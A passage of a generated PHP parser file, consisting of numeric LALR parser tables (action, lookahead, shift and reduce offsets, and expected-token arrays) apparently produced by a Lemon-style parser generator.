    241,  296,  204,  296,  296,  103,  200,  296,  199,  120,
     74,  296,  296,  296,  296,   95,  296,  296,  258,  278,
    296,  296,   34,  272,  197,  231,  279,  237,  323,  241,
    455,  204,  296,  296,   99,  202,  296,  199,  120,   56,
    241,  211,  204,  296,   95,  103,  296,  258,  199,  120,
     74,  296,  272,  197,  231,   95,  237,  323,  258,  227,
    296,  296,  296,  272,  197,  231,  296,  237,  323,  241,
    296,  204,  148,  296,  103,  203,   86,  199,  120,   73,
    296,  296,  286,  296,   95,  296,  296,  258,  278,  296,
    296,   34,  272,  197,  231,  279,  237,  323,  241,  296,
    204,  175,  296,  103,  296,  296,  199,  120,   75,  241,
    296,  204,  296,   95,  103,  296,  258,  199,  120,   63,
    296,  272,  197,  231,   95,  237,  323,  258,  229,  192,
    296,  296,  272,  197,  231,  296,  237,  323,  241,  296,
    204,  380,  296,  103,  296,  296,  199,  120,   58,  296,
    296,  296,  296,   95,  380,  296,  258,  296,  296,  296,
    380,  272,  197,  231,  296,  237,  323,  241,  296,  204,
    296,  296,  103,  296,  296,  199,  120,   71,  241,  296,
    204,  296,   95,  103,  296,  258,  199,  120,   79,  296,
    272,  197,  231,   95,  237,  323,  258,  296,  296,  296,
    154,  272,  197,  231,   87,  237,  323,  241,  296,  204,
    286,  296,  103,  296,  296,  199,  120,   70,  296,  296,
    296,  296,   95,  296,  296,  258,  296,  296,  296,  175,
    272,  197,  231,  296,  237,  323,  241,  296,  204,  296,
    296,  103,  296,  296,  199,  120,   56,  241,  296,  204,
    296,   95,  103,  296,  258,  199,  120,   46,  296,  272,
    197,  231,   95,  237,  323,  258,  296,  296,  296,  296,
    272,  197,  231,  296,  237,  323,  241,  296,  204,  296,
    296,  103,  296,  296,  199,  120,   78,  296,  296,  296,
    296,   95,  296,  296,  258,  296,  296,  296,  296,  272,
    197,  231,  296,  237,  323,  241,  296,  204,  296,  296,
    103,  296,  296,  199,  120,   66,  241,  296,  204,  296,
     95,  103,  296,  258,  199,  120,   59,  296,  272,  197,
    231,   95,  237,  323,  258,  296,  296,  296,  296,  272,
    197,  231,  296,  237,  323,  241,  296,  204,  296,  296,
    103,  296,  296,  186,  109,   57,  296,  296,  296,  296,
     95,  296,  296,  258,  296,  296,  296,  296,  272,  197,
    231,  296,  237,  323,  241,  296,  204,  296,  296,  103,
    296,  296,  188,  120,   67,  241,  296,  204,  296,   95,
    103,  296,  258,  199,   96,   62,  296,  272,  197,  231,
     95,  237,  323,  258,  296,  296,  296,  296,  272,  197,
    231,  296,  237,  323,  241,  296,  204,  296,  296,  103,
    296,  296,  199,  120,   80,  296,  296,  296,  296,   95,
    296,  296,  258,  296,  296,  296,  296,  272,  197,  231,
    296,  237,  323,  241,  296,  204,  296,  296,  103,  296,
    296,  199,  120,   76,  241,  296,  204,  296,   95,  103,
    296,  258,  199,  120,   81,  296,  272,  197,  231,   95,
    237,  323,  258,  296,  296,  296,  296,  272,  197,  231,
    296,  237,  323,  241,  296,  204,  296,  296,  103,  296,
    296,  199,  120,   65,  296,  296,  296,  296,   95,  296,
    296,  258,  296,  296,  296,  296,  272,  197,  231,  296,
    237,  323,  241,  296,  204,  296,  296,  103,  296,  296,
    199,   96,   68,  241,  296,  204,  296,   95,  103,  296,
    258,  199,  120,   61,  296,  272,  197,  231,   95,  237,
    323,  258,  296,  296,  296,  296,  272,  197,  231,  296,
    237,  323,  241,  296,  204,  296,  296,  103,  296,  296,
    199,   98,   69,  296,  296,  296,  296,   95,  296,  296,
    258,  296,  296,  296,  296,  272,  197,  231,  296,  237,
    323,  241,  296,  204,  296,  296,  103,  296,  296,  199,
    120,   72,  241,  296,  204,  296,   95,  103,  296,  258,
    199,  120,   47,  296,  272,  197,  231,   95,  237,  323,
    258,  296,  296,  296,  296,  272,  197,  231,  296,  237,
    323,  241,  192,  204,  296,  296,  103,  296,  296,  199,
    120,   60,  296,  296,  351,  296,   95,  296,  217,  258,
    296,  296,  296,  296,  272,  197,  231,   26,  237,  323,
    241,  296,  204,   16,  296,  103,  426,  296,  199,  125,
    296,  241,  296,  204,  296,   95,  103,  296,  426,  199,
    118,  296,  242,  272,  197,  231,   95,  237,  323,  296,
    296,  296,  296,  246,  272,  197,  231,  296,  237,  323,
    241,  296,  204,  278,  296,  103,   34,  296,  199,  121,
    279,  296,  296,  296,  296,   95,  296,  296,  296,  296,
     26,  296,  162,  272,  197,  231,   16,  237,  323,  241,
    296,  204,  296,  296,  103,  296,  296,  199,  123,  296,
    241,  296,  204,  296,   95,  103,  296,  296,  199,  114,
    296,  296,  272,  197,  231,   95,  237,  323,  296,  296,
    296,  296,  296,  272,  197,  231,  296,  237,  323,  241,
    296,  204,  296,  145,  103,  296,  296,  199,  124,  296,
    296,  296,  296,  286,   95,   39,   35,  243,  296,  296,
    296,  296,  272,  197,  231,  296,  237,  323,  241,  296,
    204,  296,  296,  103,  296,  296,  199,  115,  296,  241,
    296,  204,  296,   95,  103,  296,  296,  199,  113,  296,
    296,  272,  197,  231,   95,  237,  323,  296,  296,  296,
    296,  296,  272,  197,  231,  228,  237,  323,  241,  296,
    204,  296,  455,  103,  296,  455,  199,  119,    3,  455,
    439,  296,  296,   95,  296,  296,  296,  296,  296,  296,
    296,  272,  197,  231,  228,  237,  323,  296,  296,  296,
    296,  455,  296,  296,  455,  296,  296,  439,  455,  439,
    439,  228,  455,  296,  439,  296,  296,  137,  455,  296,
    296,  455,  296,  296,   32,  455,  439,  286,  296,   39,
     35,  243,   29,  296,   26,  296,  439,  296,  296,  439,
     16,  455,  296,  439,  306,   43,   40,   38,  296,  296,
    296,  296,  296,  439,  296,  296,  439,  296,  455,  296,
    439,   26,  311,  312,  313,  316,  296,   16,  228,  296,
    296,  296,   43,   40,   38,  455,  296,  296,  455,  296,
    296,  296,  455,  439,  296,  296,   19,  296,  296,  311,
    312,  313,  316,  455,  296,  296,  455,  296,  296,  296,
    455,  439,  296,  296,  296,   43,   40,   38,  296,  296,
    439,  296,  296,  439,  174,  455,  296,  439,  296,  240,
    309,  296,  311,  312,  313,  316,  296,  289,  439,  296,
     36,  439,  296,  455,  296,  439,  296,  296,   43,   40,
     38,  296,  296,   43,   40,   38,  296,  296,  296,  296,
    296,   43,   40,   38,  296,  311,  312,  313,  316,  296,
    311,  312,  313,  316,  296,   43,   40,   38,  311,  312,
    313,  316,  273,   43,   40,   38,  296,  296,  296,  296,
    296,  296,  311,  312,  313,  316,  296,  296,  296,  296,
    311,  312,  313,  316,  455,  296,  296,  455,   43,   40,
     38,  455,  439,  218,   43,   40,   38,  296,  296,  296,
    296,  296,  296,  296,  296,  311,  312,  313,  316,  296,
    296,  311,  312,  313,  316,  296,  296,  296,  296,  439,
    296,  296,  439,  296,  455,  296,  439,
    );
    public static $yy_lookahead = array(
      9,   10,   11,   12,   12,   14,   14,   16,   16,   18,
     19,   20,    9,   34,  102,   12,   25,   13,   70,   16,
     29,   30,   31,   35,   33,   21,   35,   23,   95,   38,
     26,   52,   41,   42,   43,   44,   32,   46,   34,   48,
     36,   50,   51,   52,   53,   53,   98,   99,   44,   58,
     59,    9,   10,   11,   12,   22,   14,   13,   16,   15,
     18,   19,   20,   85,   86,   87,   15,   25,   17,   21,
     26,   29,   30,   31,   44,   33,   32,   35,   45,   35,
     38,   51,   34,   41,   42,   43,   44,   35,   46,   77,
     48,   47,   50,   51,   14,   53,   16,   13,   47,   47,
     58,   59,    9,   10,   11,   12,   22,   14,   35,   16,
     26,   18,   19,   20,  102,  103,   32,   44,   25,   34,
     47,   36,   29,   30,   31,   52,   33,   14,   35,   45,
     50,   38,   26,   53,   41,   42,   43,   44,   32,   46,
     66,   48,   68,   50,   51,   77,   53,   15,   35,    7,
      8,   58,   59,    9,   10,   11,   12,   12,   14,   14,
     16,   16,   18,   19,   20,    9,   53,    1,   12,   25,
    102,   82,   16,   29,   30,   31,   44,   33,   33,   35,
    106,  107,   38,   51,   44,   41,   42,   43,   44,   35,
     46,   51,   48,   82,   50,   51,   22,   53,   53,   13,
     73,   47,   58,   59,    9,   10,   11,   12,   22,   14,
     83,   16,   26,   18,   19,   20,   28,   12,   32,   45,
     25,   22,   70,   35,   29,   30,   31,   65,   33,  102,
     35,   45,   73,   38,   60,   47,   41,   42,   43,   44,
     35,   46,   83,   48,   45,   50,   51,   95,   53,   71,
     95,   52,   74,   58,   59,    9,   10,   11,   12,   81,
     14,  102,   16,   73,   18,   19,   20,   34,   90,   36,
      1,   25,   94,   83,   81,   29,   30,   31,   66,   33,
     68,   35,   13,   96,   38,   98,   99,   41,   42,   43,
     44,   15,   46,  100,   48,   26,   50,   51,   14,   53,
     71,   32,   17,   74,   58,   59,    9,   10,   11,   12,
     81,   14,   34,   16,   36,   18,   19,   20,   82,  107,
     44,   35,   25,   94,   71,   95,   29,   30,   31,   44,
     33,   78,   35,   47,   81,   38,   51,   53,   41,   42,
     43,   44,   15,   46,   71,   48,   16,   50,   51,   22,
     53,   78,   79,    1,   81,   58,   59,    9,   10,   11,
     12,   15,   14,   17,   16,    1,   18,   19,   20,   66,
     34,   68,   36,   25,   16,   71,   44,   29,   30,   31,
     28,   33,   78,   35,   52,   81,   38,   62,   63,   41,
     42,   43,   44,   47,   46,    6,   48,    8,   50,   51,
     16,   53,   73,    1,    2,   40,   58,   59,    9,   10,
     11,   12,   83,   14,   77,   16,   52,   18,   19,   20,
     98,   99,   52,   95,   25,   97,   97,   92,   29,   30,
     31,   77,   33,   49,   35,  100,   14,   38,   16,  102,
     41,   42,   43,   44,   73,   46,   14,   48,   14,   50,
     51,   36,   53,   73,   83,    1,  102,   58,   59,    9,
     10,   11,   12,   83,   14,   17,   16,   50,   18,   19,
     20,   17,   71,   64,   65,   25,   73,   97,   15,   29,
     30,   31,   81,   33,   26,   35,   83,   53,   38,   73,
     32,   41,   42,   43,   44,   47,   46,   92,   48,   83,
     50,   51,   95,   53,   97,  100,   98,   99,   58,   59,
      9,   10,   11,   12,   23,   14,   52,   16,   16,   18,
     19,   20,   16,    7,   50,   16,   25,   13,   13,   16,
     29,   30,   31,   16,   33,   16,   35,   33,   33,   38,
     44,   16,   41,   42,   43,   44,   35,   46,   16,   48,
     95,   50,   51,   96,   53,   37,   38,   39,   81,   58,
     59,   66,   67,   68,   69,   83,   71,   72,   95,   74,
     75,   76,   54,   55,   56,   57,   81,   97,   60,   84,
     95,   13,   17,   80,   89,   90,   91,    1,   93,   94,
      2,   81,  103,   66,   67,   68,   69,   99,   71,   72,
    108,   74,   75,   76,   81,   37,   38,   39,   81,  108,
    108,   84,  108,  108,  108,   95,   89,   90,   91,  108,
     93,   94,   54,   55,   56,   57,   66,  108,   68,  108,
    108,   71,  108,  108,   74,   75,   76,  108,  108,   21,
    108,   81,  108,  108,   84,    9,  108,  108,   12,   89,
     90,   91,   16,   93,   94,   37,   38,   39,  108,  108,
    108,   66,   26,   68,  104,  105,   71,  108,   32,   74,
     75,   76,   54,   55,   56,   57,   81,    1,  108,   84,
     73,  108,  108,  108,   89,   90,   91,  108,   93,   94,
     83,    2,   85,   86,   87,  108,  108,  108,  108,  104,
    105,  108,   26,    3,    4,    5,    6,  108,   32,    9,
     10,   11,   12,  108,  108,   14,  108,   16,   18,   19,
     20,  108,  108,  108,   35,   25,   37,   38,   39,   29,
     30,   31,   66,  108,   68,   69,   47,   71,   72,  108,
     74,   75,   76,   54,   55,   56,   57,   81,  108,   48,
     84,   50,  108,  108,   53,   89,   90,   91,  108,   93,
     94,    3,  108,  108,  108,  108,  108,    9,   10,   11,
     12,  108,   14,  108,  108,  108,   18,   19,   20,  108,
    108,   13,  108,   25,   27,  108,  108,   29,   30,   31,
    108,  108,  108,    3,   37,   38,   39,  108,  108,    9,
     10,   11,   12,  108,   14,   37,   38,   39,   18,   19,
     20,   54,   55,   56,   57,   25,  108,   59,   60,   29,
     30,   31,   54,   55,   56,   57,  108,  108,   66,  108,
     68,  108,    1,   71,  108,  108,   74,   75,   76,  108,
    108,  108,  108,   81,   13,  108,   84,  108,  108,   59,
     60,   89,   90,   91,  108,   93,   94,   26,  108,  108,
     66,  108,   68,   32,  108,   71,  108,  105,   74,   75,
     76,   66,   78,   68,  108,   81,   71,  108,   84,   74,
     75,   76,  108,   89,   90,   91,   81,   93,   94,   84,
      9,  108,  108,   12,   89,   90,   91,   16,   93,   94,
     66,  108,   68,  108,  108,   71,  101,  108,   74,   75,
     76,  108,  108,  108,  108,   81,  108,  108,   84,    9,
    108,  108,   12,   89,   90,   91,   16,   93,   94,   66,
     49,   68,  108,  108,   71,  101,  108,   74,   75,   76,
     66,   78,   68,  108,   81,   71,  108,   84,   74,   75,
     76,  108,   89,   90,   91,   81,   93,   94,   84,   49,
    108,  108,  108,   89,   90,   91,  108,   93,   94,   66,
    108,   68,   73,  108,   71,  101,   77,   74,   75,   76,
    108,  108,   83,  108,   81,  108,  108,   84,    9,  108,
    108,   12,   89,   90,   91,   16,   93,   94,   66,  108,
     68,  102,  108,   71,  108,  108,   74,   75,   76,   66,
    108,   68,  108,   81,   71,  108,   84,   74,   75,   76,
    108,   89,   90,   91,   81,   93,   94,   84,   49,    1,
    108,  108,   89,   90,   91,  108,   93,   94,   66,  108,
     68,   13,  108,   71,  108,  108,   74,   75,   76,  108,
    108,  108,  108,   81,   26,  108,   84,  108,  108,  108,
     32,   89,   90,   91,  108,   93,   94,   66,  108,   68,
    108,  108,   71,  108,  108,   74,   75,   76,   66,  108,
     68,  108,   81,   71,  108,   84,   74,   75,   76,  108,
     89,   90,   91,   81,   93,   94,   84,  108,  108,  108,
     73,   89,   90,   91,   77,   93,   94,   66,  108,   68,
     83,  108,   71,  108,  108,   74,   75,   76,  108,  108,
    108,  108,   81,  108,  108,   84,  108,  108,  108,  102,
     89,   90,   91,  108,   93,   94,   66,  108,   68,  108,
    108,   71,  108,  108,   74,   75,   76,   66,  108,   68,
    108,   81,   71,  108,   84,   74,   75,   76,  108,   89,
     90,   91,   81,   93,   94,   84,  108,  108,  108,  108,
     89,   90,   91,  108,   93,   94,   66,  108,   68,  108,
    108,   71,  108,  108,   74,   75,   76,  108,  108,  108,
    108,   81,  108,  108,   84,  108,  108,  108,  108,   89,
     90,   91,  108,   93,   94,   66,  108,   68,  108,  108,
     71,  108,  108,   74,   75,   76,   66,  108,   68,  108,
     81,   71,  108,   84,   74,   75,   76,  108,   89,   90,
     91,   81,   93,   94,   84,  108,  108,  108,  108,   89,
     90,   91,  108,   93,   94,   66,  108,   68,  108,  108,
     71,  108,  108,   74,   75,   76,  108,  108,  108,  108,
     81,  108,  108,   84,  108,  108,  108,  108,   89,   90,
     91,  108,   93,   94,   66,  108,   68,  108,  108,   71,
    108,  108,   74,   75,   76,   66,  108,   68,  108,   81,
     71,  108,   84,   74,   75,   76,  108,   89,   90,   91,
     81,   93,   94,   84,  108,  108,  108,  108,   89,   90,
     91,  108,   93,   94,   66,  108,   68,  108,  108,   71,
    108,  108,   74,   75,   76,  108,  108,  108,  108,   81,
    108,  108,   84,  108,  108,  108,  108,   89,   90,   91,
    108,   93,   94,   66,  108,   68,  108,  108,   71,  108,
    108,   74,   75,   76,   66,  108,   68,  108,   81,   71,
    108,   84,   74,   75,   76,  108,   89,   90,   91,   81,
     93,   94,   84,  108,  108,  108,  108,   89,   90,   91,
    108,   93,   94,   66,  108,   68,  108,  108,   71,  108,
    108,   74,   75,   76,  108,  108,  108,  108,   81,  108,
    108,   84,  108,  108,  108,  108,   89,   90,   91,  108,
     93,   94,   66,  108,   68,  108,  108,   71,  108,  108,
     74,   75,   76,   66,  108,   68,  108,   81,   71,  108,
     84,   74,   75,   76,  108,   89,   90,   91,   81,   93,
     94,   84,  108,  108,  108,  108,   89,   90,   91,  108,
     93,   94,   66,  108,   68,  108,  108,   71,  108,  108,
     74,   75,   76,  108,  108,  108,  108,   81,  108,  108,
     84,  108,  108,  108,  108,   89,   90,   91,  108,   93,
     94,   66,  108,   68,  108,  108,   71,  108,  108,   74,
     75,   76,   66,  108,   68,  108,   81,   71,  108,   84,
     74,   75,   76,  108,   89,   90,   91,   81,   93,   94,
     84,  108,  108,  108,  108,   89,   90,   91,  108,   93,
     94,   66,    1,   68,  108,  108,   71,  108,  108,   74,
     75,   76,  108,  108,   13,  108,   81,  108,   17,   84,
    108,  108,  108,  108,   89,   90,   91,   26,   93,   94,
     66,  108,   68,   32,  108,   71,   35,  108,   74,   75,
    108,   66,  108,   68,  108,   81,   71,  108,   47,   74,
     75,  108,   88,   89,   90,   91,   81,   93,   94,  108,
    108,  108,  108,   88,   89,   90,   91,  108,   93,   94,
     66,  108,   68,    9,  108,   71,   12,  108,   74,   75,
     16,  108,  108,  108,  108,   81,  108,  108,  108,  108,
     26,  108,   28,   89,   90,   91,   32,   93,   94,   66,
    108,   68,  108,  108,   71,  108,  108,   74,   75,  108,
     66,  108,   68,  108,   81,   71,  108,  108,   74,   75,
    108,  108,   89,   90,   91,   81,   93,   94,  108,  108,
    108,  108,  108,   89,   90,   91,  108,   93,   94,   66,
    108,   68,  108,   73,   71,  108,  108,   74,   75,  108,
    108,  108,  108,   83,   81,   85,   86,   87,  108,  108,
    108,  108,   89,   90,   91,  108,   93,   94,   66,  108,
     68,  108,  108,   71,  108,  108,   74,   75,  108,   66,
    108,   68,  108,   81,   71,  108,  108,   74,   75,  108,
    108,   89,   90,   91,   81,   93,   94,  108,  108,  108,
    108,  108,   89,   90,   91,    2,   93,   94,   66,  108,
     68,  108,    9,   71,  108,   12,   74,   75,   15,   16,
     17,  108,  108,   81,  108,  108,  108,  108,  108,  108,
    108,   89,   90,   91,    2,   93,   94,  108,  108,  108,
    108,    9,  108,  108,   12,  108,  108,   44,   16,   17,
     47,    2,   49,  108,   51,  108,  108,   73,    9,  108,
    108,   12,  108,  108,   15,   16,   17,   83,  108,   85,
     86,   87,   24,  108,   26,  108,   44,  108,  108,   47,
     32,   49,  108,   51,   52,   37,   38,   39,  108,  108,
    108,  108,  108,   44,  108,  108,   47,  108,   49,  108,
     51,   26,   54,   55,   56,   57,  108,   32,    2,  108,
    108,  108,   37,   38,   39,    9,  108,  108,   12,  108,
    108,  108,   16,   17,  108,  108,    2,  108,  108,   54,
     55,   56,   57,    9,  108,  108,   12,  108,  108,  108,
     16,   17,  108,  108,  108,   37,   38,   39,  108,  108,
     44,  108,  108,   47,   13,   49,  108,   51,  108,   13,
     52,  108,   54,   55,   56,   57,  108,   13,   44,  108,
      2,   47,  108,   49,  108,   51,  108,  108,   37,   38,
     39,  108,  108,   37,   38,   39,  108,  108,  108,  108,
    108,   37,   38,   39,  108,   54,   55,   56,   57,  108,
     54,   55,   56,   57,  108,   37,   38,   39,   54,   55,
     56,   57,   36,   37,   38,   39,  108,  108,  108,  108,
    108,  108,   54,   55,   56,   57,  108,  108,  108,  108,
     54,   55,   56,   57,    9,  108,  108,   12,   37,   38,
     39,   16,   17,   36,   37,   38,   39,  108,  108,  108,
    108,  108,  108,  108,  108,   54,   55,   56,   57,  108,
    108,   54,   55,   56,   57,  108,  108,  108,  108,   44,
    108,  108,   47,  108,   49,  108,   51,
);
    const YY_SHIFT_USE_DFLT = -22;
    const YY_SHIFT_MAX = 230;
    public static $yy_shift_ofst = array(
    -22,  501,  501,   93,  399,  399,  450,   93,   93,   93,
    399,  450,   -9,   93,   93,   93,   93,   93,   93,  144,
     93,  195,   93,   93,   93,  246,  195,   93,   93,   93,
     93,   93,  297,   93,   93,   93,   93,  348,   42,   42,
     42,   42,   42,   42,   42,   42, 1768, 1795, 1795,  701,
    758, 1521,   80,  676,  113,  790, 1927, 1828, 1896,  568,
    768, 1861,  757, 1866, 1874, 1888,  618,  518, 1921, 1921,
   1921, 1921, 1921, 1921, 1921, 1921, 1921, 1921, 1921, 1921,
   1921, 1921, 1921, 1584,  636,  285,  676,  676,  346,  113,
    113,  402,  700, 1723,   -8,  910,  831,  269, 1028,   51,
      3,    3,  422,  448,  352,  106,  422,  106,  458,  364,
    434,  454,  106,  166,  166,  166,  166,  565,  166,  166,
    166,  586,  565,  166,  166,  -22,  -22, 1752, 1769, 1826,
   1844, 1945,  145,  979,  156,  132,  284,  106,  140,  106,
     30,  140,  140,   30,  106,  106,  106,  140,  106,  106,
    140,  106,  327,  106,  106,  106,  140,  140,  106,  140,
    205,  106,  284,  166,  565,  588,  565,  588,  565,  166,
    166,  -12,  166,  -22,  -22,  -22,  -22,  -22,  -22,  689,
      4,   44,   84,  186,   73,  881,  199,  188,  174,  286,
     48,  336,  384,  389,  332,  142,  -21,   52,  154,   33,
     85,  276,  278,  233,  515,  509,  474,  516,  502,  464,
    491,  415,  417,  432,  514,  370,  463,  506,  365,  513,
    -12,  517,  504,  519,  505,  511,  496,  525,  532,  330,
    358,
);
    const YY_REDUCE_USE_DFLT = -89;
    const YY_REDUCE_MAX = 178;
    public static $yy_reduce_ofst = array(
    325,  527,  495,  666,  595,  560,  863,  874,  834,  805,
    762,  794, 1179, 1455, 1208, 1012, 1386, 1139, 1070, 1110,
   1150, 1219, 1248, 1277, 1288, 1317, 1346, 1357, 1415, 1426,
   1081, 1041, 1001,  972,  943,  932,  903, 1484, 1495, 1622,
   1633, 1662, 1593, 1564, 1553, 1524, 1704,  607, 1590,  178,
     74, 1027,  229,  899,  273,  212,  -22,  -22,  -22,  -22,
    -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,
    -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,  -22,
    -22,  -22,  -22,  380,  329,  187,  159,  127,  -52,  253,
    304,   12,  303,  152,  193,  328,   68,   68,   68,  322,
    328,  407,  405,  322,   68,  190,  335,  416,  403,   68,
    401,  354,  371,   68,   68,   68,  337,  322,   68,   68,
     68,   68,  408,   68,   68,   68,  409,  455,  455,  455,
    455,  455,  510,  480,  455,  455,  477,  482,  457,  482,
    473,  457,  457,  485,  482,  482,  482,  457,  482,  482,
    457,  482,  503,  482,  482,  482,  457,  457,  482,  457,
    520,  482,  523,  -88,  498,  489,  498,  489,  498,  -88,
    -88,  -67,  -88,  111,  155,   89,  236,  230,  162,
);
    public static $yyExpectedTokens = array(
         array(),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 52, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
         array(9, 10, 11, 12, 14, 16, 18, 19, 20, 25, 29, 30, 31, 33, 35, 38, 41, 42, 43, 44, 46, 48, 50, 51, 53, 58, 59, ),
